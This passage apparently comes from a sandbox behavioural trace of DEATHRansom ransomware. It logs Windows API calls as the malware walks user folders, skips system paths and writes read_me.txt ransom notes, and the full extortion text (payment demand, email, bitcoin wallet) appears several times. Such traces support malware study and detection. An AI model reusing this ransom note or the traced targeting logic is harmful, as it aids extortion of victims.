pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\OxHI_zkRZQhTWMK.mkv") returned 70 [0076.064] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e539a70, ftCreationTime.dwHighDateTime=0x1d4ccf6, ftLastAccessTime.dwLowDateTime=0x14982aa0, ftLastAccessTime.dwHighDateTime=0x1d4d28f, ftLastWriteTime.dwLowDateTime=0x14982aa0, ftLastWriteTime.dwHighDateTime=0x1d4d28f, nFileSizeHigh=0x0, nFileSizeLow=0x160b1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qwCPYTNwoNJY0yytIU.flv", cAlternateFileName="QWCPYT~1.FLV")) returned 1 [0076.064] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\qwCPYTNwoNJY0yytIU.flv") returned 73 [0076.064] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e539a70, ftCreationTime.dwHighDateTime=0x1d4ccf6, ftLastAccessTime.dwLowDateTime=0x14982aa0, ftLastAccessTime.dwHighDateTime=0x1d4d28f, ftLastWriteTime.dwLowDateTime=0x14982aa0, ftLastWriteTime.dwHighDateTime=0x1d4d28f, nFileSizeHigh=0x0, nFileSizeLow=0x160b1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qwCPYTNwoNJY0yytIU.flv", cAlternateFileName="QWCPYT~1.FLV")) returned 0 [0076.064] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.065] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\read_me.txt") returned 62 [0076.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xwjzbluzl\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f0 [0076.065] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.065] WriteFile (in: hFile=0x8f0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.066] CloseHandle (hObject=0x8f0) returned 1 [0076.066] GetProcessHeap () returned 0x4f10000 [0076.066] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b900d0 | out: hHeap=0x4f10000) returned 1 [0076.066] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x8933d250, ftLastAccessTime.dwHighDateTime=0x1d4c8a9, ftLastWriteTime.dwLowDateTime=0x8933d250, ftLastWriteTime.dwHighDateTime=0x1d4c8a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="xwjzbluzl", cAlternateFileName="XWJZBL~1")) returned 0 [0076.066] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0076.066] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\read_me.txt") returned 52 [0076.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.066] GetProcessHeap () returned 0x4f10000 [0076.066] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8df1108 | out: hHeap=0x4f10000) returned 1 [0076.066] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2afe550, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2afe550, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="videos", cAlternateFileName="")) returned 0 [0076.066] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.066] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\read_me.txt") returned 45 [0076.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0076.075] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.075] WriteFile (in: hFile=0x7fc, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.076] CloseHandle (hObject=0x7fc) returned 1 [0076.076] GetProcessHeap () returned 0x4f10000 [0076.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ae0078 | out: hHeap=0x4f10000) returned 1 [0076.076] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x240000, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0076.076] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0076.076] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0076.076] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0076.076] StrStrW (lpFirst="all users", lpSrch="programdata") returned 0x0 [0076.076] StrStrW (lpFirst="all users", lpSrch="$recycle.bin") returned 0x0 [0076.076] StrStrW (lpFirst="all users", lpSrch="program files") returned 0x0 [0076.076] StrStrW (lpFirst="all users", lpSrch="windows") returned 0x0 [0076.076] StrStrW (lpFirst="all users", lpSrch="all users") returned="all users" [0076.076] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x240000, cFileName="Default", cAlternateFileName="")) returned 1 [0076.076] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default") returned 20 [0076.077] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0076.077] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0076.077] StrStrW (lpFirst="default", lpSrch="programdata") returned 0x0 [0076.077] StrStrW (lpFirst="default", lpSrch="$recycle.bin") returned 0x0 [0076.077] StrStrW (lpFirst="default", lpSrch="program files") returned 0x0 [0076.077] StrStrW (lpFirst="default", lpSrch="windows") returned 0x0 [0076.077] StrStrW (lpFirst="default", lpSrch="all users") returned 0x0 [0076.077] StrStrW (lpFirst="default", lpSrch="appdata") returned 0x0 [0076.077] GetProcessHeap () returned 0x4f10000 [0076.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ae0078 [0076.077] lstrcpyW (in: lpString1=0x8ae0078, lpString2="\\\\?\\C:\\Users\\Default" | out: lpString1="\\\\?\\C:\\Users\\Default") returned="\\\\?\\C:\\Users\\Default" [0076.077] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 94 [0076.077] QueueUserWorkItem (Function=0x40a710, Context=0x8ae0078, Flags=0x0) returned 1 [0076.077] GetProcessHeap () returned 0x4f10000 [0076.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b900d0 [0076.077] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\*") returned 22 [0076.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0076.077] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\.") returned 22 [0076.077] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.077] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.077] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\..") returned 23 [0076.077] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.077] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="AppData", cAlternateFileName="")) returned 1 [0076.077] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData") returned 28 [0076.078] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0076.078] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0076.078] StrStrW (lpFirst="appdata", lpSrch="programdata") returned 0x0 [0076.078] StrStrW (lpFirst="appdata", lpSrch="$recycle.bin") returned 0x0 [0076.078] StrStrW (lpFirst="appdata", lpSrch="program files") returned 0x0 [0076.078] StrStrW (lpFirst="appdata", lpSrch="windows") returned 0x0 [0076.078] StrStrW (lpFirst="appdata", lpSrch="all users") returned 0x0 [0076.078] StrStrW (lpFirst="appdata", lpSrch="appdata") returned="appdata" [0076.078] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0076.078] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data") returned 37 [0076.078] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0076.078] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0076.078] StrStrW (lpFirst="application data", lpSrch="programdata") returned 0x0 [0076.078] StrStrW (lpFirst="application data", lpSrch="$recycle.bin") returned 0x0 [0076.078] StrStrW (lpFirst="application data", lpSrch="program files") returned 0x0 [0076.078] StrStrW (lpFirst="application data", lpSrch="windows") returned 0x0 [0076.078] StrStrW (lpFirst="application data", lpSrch="all users") returned 0x0 [0076.078] StrStrW (lpFirst="application data", lpSrch="appdata") returned 0x0 [0076.078] GetProcessHeap () returned 0x4f10000 [0076.078] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e21120 [0076.079] lstrcpyW (in: lpString1=0x8e21120, lpString2="\\\\?\\C:\\Users\\Default\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data") returned="\\\\?\\C:\\Users\\Default\\Application Data" [0076.079] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 95 [0076.079] QueueUserWorkItem (Function=0x40a710, Context=0x8e21120, Flags=0x0) returned 1 [0076.079] GetProcessHeap () returned 0x4f10000 [0076.079] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.080] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned 39 [0076.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x13, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="xwjzbluzl", cAlternateFileName="\x07")) returned 0xffffffff [0076.080] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\read_me.txt") returned 49 [0076.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\read_me.txt" (normalized: "c:\\users\\default\\application data\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.086] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.086] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.087] CloseHandle (hObject=0x79c) returned 1 [0076.087] GetProcessHeap () returned 0x4f10000 [0076.087] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.091] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Contacts", cAlternateFileName="")) returned 1 [0076.091] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts") returned 29 [0076.091] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0076.091] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0076.091] StrStrW (lpFirst="contacts", lpSrch="programdata") returned 0x0 [0076.091] StrStrW (lpFirst="contacts", lpSrch="$recycle.bin") returned 0x0 [0076.091] StrStrW (lpFirst="contacts", lpSrch="program files") returned 0x0 [0076.091] StrStrW (lpFirst="contacts", lpSrch="windows") returned 0x0 [0076.091] StrStrW (lpFirst="contacts", lpSrch="all users") returned 0x0 [0076.091] StrStrW (lpFirst="contacts", lpSrch="appdata") returned 0x0 [0076.091] GetProcessHeap () returned 0x4f10000 [0076.091] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0076.092] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\Users\\Default\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts") returned="\\\\?\\C:\\Users\\Default\\Contacts" [0076.092] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 96 [0076.092] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0076.092] GetProcessHeap () returned 0x4f10000 [0076.092] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0076.094] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\*") returned 31 [0076.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.095] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\.") returned 31 [0076.095] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.095] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.095] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\..") returned 32 [0076.095] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.095] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0076.095] wnsprintfW (in: 